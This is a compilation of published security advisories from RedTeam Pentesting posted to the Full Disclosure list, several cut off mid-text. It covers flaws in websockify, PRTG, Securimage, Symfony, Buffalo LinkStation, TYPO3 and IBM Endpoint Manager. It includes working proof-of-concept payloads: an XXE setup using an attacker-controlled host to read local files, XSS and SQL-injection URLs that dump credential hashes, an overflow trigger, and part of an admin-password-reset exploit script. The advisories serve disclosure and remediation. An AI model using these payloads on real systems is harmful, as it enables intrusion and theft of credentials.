handshake data, the loop is terminated. Otherwise, the loop is terminated after a maximum of 10 iterations. The do_handshake() function returns early if no more data can be received from the socket. By forcing websockify to iterate multiple times, attackers can exploit this behaviour to write data past the space allocated for the handshake buffer, thereby corrupting adjacent memory. Proof of Concept The following curl command can be used to trigger the buffer overflow: $ curl http://example.com/$(python -c 'print "A"*5000') Providing a generic exploit for this vulnerability is not feasible, as it depends on the server side environment websockify is used in as well as the used compiler and its flags. However, during a penetration test it was possible to successfully exploit this buffer overflow vulnerability and to execute arbitrary commands on the server. Workaround == Use the Python implementation of websockify. Fix === The vulnerability has been fixed in commit 192ec6f [0]. Security Risk = Successful exploitation of the vulnerability allows attackers to execute arbitrary code on the affected system. It is therefore rated as a high risk. Timeline 2016-04-14 Vulnerability identified 2016-05-03 Advisory provided to customer 2016-05-06 Customer provided updated firmware, notified users 2016-05-23 Customer notified users again 2016-05-31 Advisory published References ====== [0] https://github.com/kanaka/websockify/commit/192ec6f5f9bf9c80a089ca020d05ad4bd9e7bcd9 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen
[FD] [RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor
Advisory: XML External Entity Expansion in Paessler PRTG Network Monitor Authenticated users who can create new HTTP XML/REST Value sensors in PRTG Network Monitor can read local files on the PRTG host system via XML external entity expansion. Details === Product: Paessler PRTG Network Monitor Affected Versions: 14.4.12.3282 Fixed Versions: 16.2.23.3077/3078 Vulnerability Type: XML External Entity Expansion Security Risk: medium Vendor URL: https://www.paessler.com/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-012 Advisory Status: published CVE: CVE-2015-7743 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7743 Introduction "PRTG Network Monitor is the powerful and comprehensive network monitoring solution from Paessler AG. It monitors your network using a whole range of technologies and assures the availability of network components and measures traffic and usage. PRTG saves costs by avoiding outages, optimizing connections, saving time and controlling service level agreements (SLAs)." (from the vendor's website)[1] More Details An attacker with access to a PRTG Network Monitor account with sufficient privileges to create or configure XML/REST sensors can read files stored on the system's local disk. These sensors are intended to query a URL and, depending on the configuration, check whether there is a valid response or read the value of a specific XML node in the document that is returned. This functionality is vulnerable to XML external entity expansion. Proof of Concept In order to exploit this vulnerability an HTTP XML/REST Value sensor has to be set up to access an attacker-controlled URL and to read the value of a specific XML node, for example: https://attacker.example.com/xeee-hosts.xml The XML document "xeee-hosts.xml" contains an external entity that uses the "SYSTEM" keyword to load a local file as the content of the "hosts" entity: ]> &hosts; Since the XML parser of PRTG Network Monitor evaluates external entities, the XML parser fetches the file "C:\Windows\System32\drivers\etc\hosts" from the disk of the local system and inserts its content into the "root" node of the XML document. If the sensor is configured to return the value of that "root" node, the contents of that file are displayed in the web interface of PRTG Network Monitor. This discloses the contents of the file to attackers which otherwise would not be able to read local files. Fix === Update to a version greater or equal to 16.2.23.3077/3078 (see [2]). Security Risk = Attackers who can create new HTTP XML/REST sensors in PRTG Network Monitor, are able to use the XML external entity expansion to read files on the local system. Depending on the data stored on the vulnerable system, this vulnerability may pose a high risk. However, as attackers are required to already have valid user credentials for the application, the vulnerability is only rated to have a medium risk potential. Timeline 2015-08-28 Vulnerability identified in PRTG Network Monitor 2015-09-04 Customer approved disclosure of vulnerability 2015-09-04 CVE ID requested 2015-09-24 CVE ID requested again 2015-10-07 CVE ID assigned 2015-10-21 Vendor contacted 2016-04-04 Vendor released fixed version 2016-05-31 Advisory released References == [1] https://www.paessler.com [2] https://www.paessler.com/prtg/history/stable RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpgv8JIaVg6x.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2016-002] Cross-site Scripting in Securimage 3.6.2
Advisory: Cross-site Scripting in Securimage 3.6.2 RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Securimage CAPTCHA software, which allows attackers to inject arbitrary JavaScript code via a crafted URL. Details === Product: Securimage Affected Versions: >= 3.2RC1 Fixed Versions: 3.6.4 Vulnerability Type: Cross-site Scripting Security Risk: high Vendor URL: https://www.phpcaptcha.org/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-002 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "Securimage is an open-source free PHP CAPTCHA script for generating complex images and CAPTCHA codes to protect forms from spam and abuse. It can be easily added into existing forms on your website to provide protection from spam bots. It can run on most any web server as long as you have PHP installed, and GD support within PHP. Securimage does everything from generating the CAPTCHA images to validating the typed code. Audible codes can be streamed to the browser with Flash for the vision impaired." (from the project's homepage) More Details The Securimage download package and GitHub repository include several example scripts to demonstrate the usage of the library. Among these scripts is the file example_form.ajax.php. It returns JavaScript code that includes an unencoded value from the variable $_SERVER['PHP_SELF'] directly embedded into the website. In Securimage versions from 3.2RC1 to 3.5 the following code is vulnerable: function processForm() { new Ajax.Request('', { method: 'post', parameters: $('contact_form').serialize(), onSuccess: function(transport) { In Securimage versions from 3.5.2 to 3.6.2 the following code is vulnerable: function processForm() { jQuery.ajax({ url: '', type: 'POST', data: jQuery('#contact_form').serialize(), dataType: 'json', }).done(function(data) { The problem here is that the value of the variable $_SERVER['PHP_SELF'] can, depending on the configuration of the web server, often be manipulated by an attacker to include special characters like apostrophes. Proof of Concept The following URL can be used to demonstrate the vulnerability for Securimage versions from 3.2RC1 to 3.5 on with a vulnerable web server configuration: http://www.example.com/example_form.ajax.php/');}alert('RedTeam Pentesting');a=function(){a(' Securimage versions from 3.5.2 to 3.6.2 can be exploited with the following URL: http://www.example.com/example_form.ajax.php/'});}alert('RedTeam Pentesting');a=function(){a({x:' The result is a notification showing the text "RedTeam Pentesting". The value of the variable $_SERVER['PHP_SELF'] is embedded in verbatim into the HTML source code of the resulting web page. Workaround == The file example_form.ajax.php should be deleted from the Securimage directory on a web server. Fix === Update to version 3.6.4. Security Risk = This security vulnerability is rated as a high risk. It allows executing arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers. This provides many possibilities for further attacks against these users. Since Securimage is usually used as a software library to provide CAPTCHA functionality for web applications, the vulnerability could be used to exploit all web applications hosted on the same domain. Timeline 2016-02-03 Vulnerability identified 2016-02-12 Customer approved disclosure to vendor 2016-02-23 CVE number requested 2016-02-24 CVE number not assigned, "non-prioritized product" 2016-03-02 Vendor contacted 2016-03-03 Vendor releases fixed version 2016-03-22 Advisory released References == https://www.phpcaptcha.org/uncategorized/securimage-3-6-4-released/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials
Device.Services.VoiceService.1.VoiceProfile. 1.Enable Enabled InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.Enable Enabled InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.X_AVM-DE_UseAuthUsername 0 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.X_AVM-DE_CLIRType 5 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.PSTNFailOver 0 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.DTMFMethod RFC2833 InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.OutboundProxy sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.UserAgentDomain sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.RegistrarServer sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.SIP.ProxyServer sip.alice-voip.de InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.AuthPassword 0241463x InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.DirectoryNumber 463x InternetGatewayDevice.Services.VoiceService.1.VoiceProfile. 1.Line.1.SIP.AuthUserName 49241463x 39315850 [msg24] CPE -> ACS B: - http://schemas.xmlsoap.org/soap/envelope/"; xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:cwmp="urn:dslforum-org:cwmp-1-0"> 393158501 0 [msg25] CPE <- ACS B: - [empty] Workaround == o2 implemented countermeasures that prevent attackers from spoofing a victim's IP address in CWMP messages. This prevents attackers from retrieving arbitrary o2 customers' VoIP credentials. Fix === The CPE needs to be properly authenticated when communicating with the ACS. One option of doing so would be to provide the password of the DSL connection. This password is already known to the CPE as it has been entered manually by the customer during the initial setup process. Security Risk = This vulnerability allows the unauthorised usage of foreign VoIP telephone numbers. The victim will be charged with all costs resulting from fraudulent phone calls. Furthermore, an attacker may answer phone calls on behalf of the victim. Customers have no means of defending oneself from such an attack. Chances are that the attack will be noticed only by customers who regularly check their invoice. The vulnerability is therefore considered to pose a high risk. Timeline 2014-09-08 - Potential vulnerability discovered 2014-09-20 - Vulnerability verified 2014-10-17 - ISP was notified about the vulnerability 2014-10-17 - ISP implemented first countermeasures 2014-10-24 - ISP wants to investigate further 2014-11-28 - ISP needs more time, depends on hardware manufacturer 2015-01-23 - ISP is still investigating, wants to permanently solve the problem 2015-03-31 - ISP is still working on the problem, asks for more time 2015-06-12 - ISP wants to notify the proper German authorities about the problem first while working on a solution 2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI, BSI) 2016-01-08 - Advisory released References == [0] https://www.iol.unh.edu/sites/default/files/knowledgebase/hnc/TR-069_Crash_Course.pdf RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpa1AvukOibQ.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images
-14 CVE number assigned 2014-11-17 Vendor provided fixed version to RedTeam Pentesting 2015-07-16 Vendor started releasing fixed versions (7490 [0]) 2015-10-01 Vendor finished releasing fixed versions (other models) 2016-01-07 Advisory released References == [0] https://avm.de/service/sicherheitshinweise/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpV_yHjm4V8o.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2015-013] Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality
ure, the web application did not assign a new value to the PHPSESSID cookie. If an attacker somehow got in possession of the cookie's value or has successfully set a given cookie value in the user's browser at some point in the past, the attacker is now able to access the web application with the user's permissions: $ curl -s -i 'http://localhost:8000/en/admin/post/' \ -b 'PHPSESSID=redteam' HTTP/1.1 200 OK Host: localhost:8000 [...] [...] In hac habitasse platea dictumst anna_ad...@symfony.com 8/23/15, 10:16 AM [...] Workaround == Disable the "Remember Me" login functionality within the configuration file security.yml. Fix === Upgrade to a fixed version if possible, otherwise refer to section Workaround. Security Risk = The described vulnerability allows an attacker to access a Symfony web application with the attacked user's permissions. The attack requires that the "Remember Me" login functionality is used by the application. Additionally, the attacker either got access to the PHPSESSID cookie value or has successfully set a new value in the user's browser. Because of its requirements, the described vulnerability poses a low risk only. The risk estimation may be increased to medium or high based on the affected web application and the accessible data. Timeline 2015-09-11 Vulnerability identified 2015-09-16 Customer approved disclosure to vendor 2015-10-27 Vendor notified 2015-11-23 Fixed by vendor [2] 2015-12-22 Advisory released References == [0] https://github.com/symfony/symfony-demo [1] https://symfony.com/doc/current/cookbook/security/remember_me.html [2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpLGWgFI5Ifs.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2015-006] Buffalo LinkStation Authentication Bypass
rn False if r.status_code != 200: sys.stdout.write("bad reply.\n") sys.stdout.flush() return False try: reply = json.loads(r.text) sid = reply['data'][0]['sid'] except: sys.stdout.write("error while parsing reply.") sys.stdout.flush() return False #do not check success key of JSON reply here. #it will most likely be false (user/password wrong)! sys.stdout.write("ok.\n") sys.stdout.flush() return sid def set_admin_password(url, sid, password): headers = {'User-Agent': None} payload = {'bufaction': 'setUserSettingsadmin', 'userName': 'admin', 'userId': '52', 'userDesc': 'Built-in account for ' + 'administering the system', 'pwd': args.password, 'confPwd': args.password, 'primGroup': 'admin', 'quota_soft': '', 'quota_hard': ''} cookies = {'webui_session_RedTeam': '%s_en_0' % sid} try: sys.stdout.write("Trying to set admin password to %s... " % password) sys.stdout.flush() r = requests.post(url, headers=headers, cookies=cookies, data=payload, verify=False) except: sys.stdout.write("could not connect to target.\n") sys.stdout.flush() return False if r.status_code != 200: sys.stdout.write("bad reply.\n") sys.stdout.flush() return False try: reply = json.loads(r.text) success = reply['success'] except: sys.stdout.write("error while parsing reply.\n") sys.stdout.flush() return False if success == True: sys.stdout.write("ok.\n") sys.stdout.flush() else: sys.stdout.write("failed.\n") sys.stdout.flush() return success requests.packages.urllib3.disable_warnings() url = "https://%s:%s/dynamic.pl"; % (args.host, args.port) sid = get_session_id(url) if sid == False: sys.exit(-1) if set_admin_password(url, sid, args.password) == True: sys.stdout.write("\n") sys.stdout.write("Admin password successfully set!\n") sys.stdout.write("URL: https://%s:%s/\n"; % (args.host, args.port)) sys.stdout.write("New credentials: admin : %s\n" % args.password) sys.exit(0) else: sys.exit(-1) Workaround == If possible, disable access to the web interface, for example via an ACL in the responsible ethernet switch. Fix === Users should install firmware version 1.71 or higher to ensure proper server-side authentication. In addition, a password should be set for the "guest" user account, which is by default present and enabled, but does not have a password. Security Risk = This vulnerability allows an unauthenticated attacker to gain administrative privileges on a Buffalo LinkStation. All attached storage devices may then be accessed by the attacker. This puts the available data at risk as confidential information may be disclosed, valuable information destroyed or manipulated. Depending on the firmware of the device, an attacker may also be able execute malicious code on the LinkStation either via installing a customized firmware image[0] or by exploiting a publicly disclosed remote command injection vulnerability[1]. It is therefore estimated that the vulnerability poses a high risk to anyone who uses an affected device. Timeline 2015-03-30 Vulnerability identified 2015-04-09 Customer approved disclosure to vendor 2015-06-09 Vendor notified 2015-06-09 Vendor responds: vulnerability is fixed in version 1.70 2015-06-09 Verified that vulnerability is not fixed in version 1.70 2015-06-09 Vendor responded: vulnerability is already known and being worked on, release date is not known 2015-06-09 Vendor provided list of affected devices 2015-07-10 Vendor queried for update, no response 2015-08-03 Vendor queried for update (by phone) 2015-08-04 Vendor responded: advisory has been forwarded to development. 2015-08-04 Vendor queried for estimated fix 2015-08-13 Vendor announced fixed version 1.71 2015-09-04 CVE ID requested 2015-09-07 RedTeam verified that the vulnerability has been fixed 2015-10-07 CVE ID not assigned, may be "duplicate finding" 2015-10-08 Advisory published References == [0] http://buffalo.nas-central.org/wiki/Category:LS-WXL [1] https://www.andreafabrizi.it/?exploits:terastation RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security
[FD] [RT-SA-2015-002] SQL Injection in TYPO3 Extension Akronymmanager
Advisory: SQL Injection in TYPO3 Extension Akronymmanager An SQL injection vulnerability in the TYPO3 extension "Akronymmanager" allows authenticated attackers to inject SQL statements and thereby read data from the TYPO3 database. Details === Product: sb_akronymmanager Affected Versions: <=0.5.0 Fixed Versions: 7.0.0 Vulnerability Type: SQL Injection Security Risk: medium Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002 Advisory Status: published CVE: CVE-2015-2803 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803 Introduction "The Acronym Manager adds special explanatory markup to acronyms, abbreviations and foreign words on the whole site following the requirement to accessible web content. It provides a backend module to administer a list of words to generate new HTML elements for explanatory markup." (from the extension's documentation) More Details Users with the respective privileges can maintain acronyms through the Akronymmanager extension pages in the TYPO3 backend web interface. In the extension's file mod1/index.php, an SQL query is generated like follows (line 357 and following): [...] $pageID = t3lib_div::_GET("id"); if ($pageID) $where = "uid='$pageID' AND "; $result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages', $where.'hidden="0" AND deleted="0"','sorting'); [...] The value of the user-supplied HTTP GET parameter 'id' is used without sanitizing it before its use in the subsequent SQL statement. Therefore, attackers are able to manipulate the resulting SQL statement and inject their own queries into the statement. Proof of Concept When requesting the following URL, the vulnerability is exploited to yield all usernames and hashes from the TYPO3 be_users database: http://www.example.org/typo3conf/ext/sb_akronymmanager/mod1/index.php? id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password) %20FROM%20be_users),2%20--%20 The login credentials are then embedded in the HTML page that is returned: [...] user1:$hash,user2:$hash[...] [...] Workaround == Only give trusted users access to the Akronymmanager extension in the TYPO3 backend. Fix === Upgrade the extension to version 7.0.0. Security Risk = An attacker who has access to the backend part of the Akronymmanager extension may send SQL queries to the database. This can be used to read arbitrary tables of the TYPO3 database and may ultimately result in a privilege escalation if the TYPO3 users' password hashes can be cracked efficiently. Depending on the database configuration, it might also be possible to execute arbitrary commands on the database host. As the attack requires an attacker who already has backend access, the vulnerability is estimated to pose only a medium risk. Timeline 2015-02-25 Vulnerability identified 2015-03-04 Customer approved disclosure to vendor 2015-03-10 CVE number requested 2015-03-10 Vendor notified 2015-03-26 CVE number requested again 2015-03-31 CVE number assigned (request #2) 2015-03-31 Vendor notified again 2015-03-31 Vendor responded 2015-04-08 Vendor announced fixed version available at the end of April 2015-05-13 Requested update from vendor 2015-05-15 Vendor requests more time 2015-05-21 Requested update from vendor 2015-05-22 Vendor states that upload to extension registry doesn't work 2015-06-03 Requested update from vendor 2015-06-10 Vendor uploads new version to extension registry 2015-06-15 Advisory published RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature __
[FD] [RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery
controlled web page. The vulnerability is therefore rated as a medium risk. Timeline 2015-03-16 Vulnerability identified 2015-03-25 Customer approves disclosure to vendor 2015-03-26 CVE number requested 2015-03-31 CVE number assigned 2015-04-01 Vendor notified 2015-04-02 Vendor acknowledged receipt of advisories 2015-04-08 Requested status update from vendor, vendor is investigating 2015-04-29 Requested status update from vendor, vendor is still investigating 2015-05-22 Requested status update from vendor 2015-05-27 Vendor is working on the issue 2015-06-05 Vendor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2015-003] Alcatel-Lucent OmniSwitch Web Interface Weak Session ID
dor notified customers 2015-06-08 Vendor provided details about affected versions 2015-06-10 Advisory released References ====== [0] https://github.com/xmendez/wfuzz RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite
und == Implement a new filter which validates file names and insert this filter before hybris' own MediaFilter. The new filter should return an error when a file outside the media directory is requested. Fix === Upgrade to a fixed hybris version or apply the vendor's hot fix. Security Risk = This vulnerability can be used to download files from the file system of the server. This includes, among others, configuration files and the hybris order logfile, which contains sensitive data. Therefore, the vulnerability poses a high risk. Timeline 2014-10-08 Vulnerability identified 2014-10-08 Customer notified vendor 2014-10-29 Vendor released fixed version 2014-11-11 CVE number requested 2014-11-12 Vendor requests more time to notify their customers 2014-11-14 CVE number assigned 2014-12-08 Vendor again requests more time to notify customers 2015-01-12 Vendor notifies customers again, agrees to release advisory on 2015-02-18 2015-02-17 Vendor requests more time to notify customers for the 3rd time, RedTeam Pentesting declines 2015-02-18 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-013] Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser. Details === Product: IBM Endpoint Manager Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48 Fixed Versions: 9.1.1229, 9.2.1.48 Vulnerability Type: Cross-Site Scripting Security Risk: medium Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013 Advisory Status: published CVE: CVE-2014-6137 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137 Introduction IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time. (from the vendor's homepage) More Details Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information. For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite &version=1 &useCRC=0 The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &version=1 &url=http://";>alert(/XSS/) &version=1 &useCRC=0 The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser: $ curl http://tem-relay.example.com:52311/rd [...] [...] http://";>alert(/XSS/) Proof of Concept http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion&version=1 &url=http://";>alert(/XSS/) &version=1 &useCRC=0 Fix === Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48. Security Risk = As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk. Timeline 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-09-03 Vendor notified 2015-01-13 Vendor releases security bulletin and software upgrade 2015-02-04 Customer approves public disclosure 2015-02-10 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital si
[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0
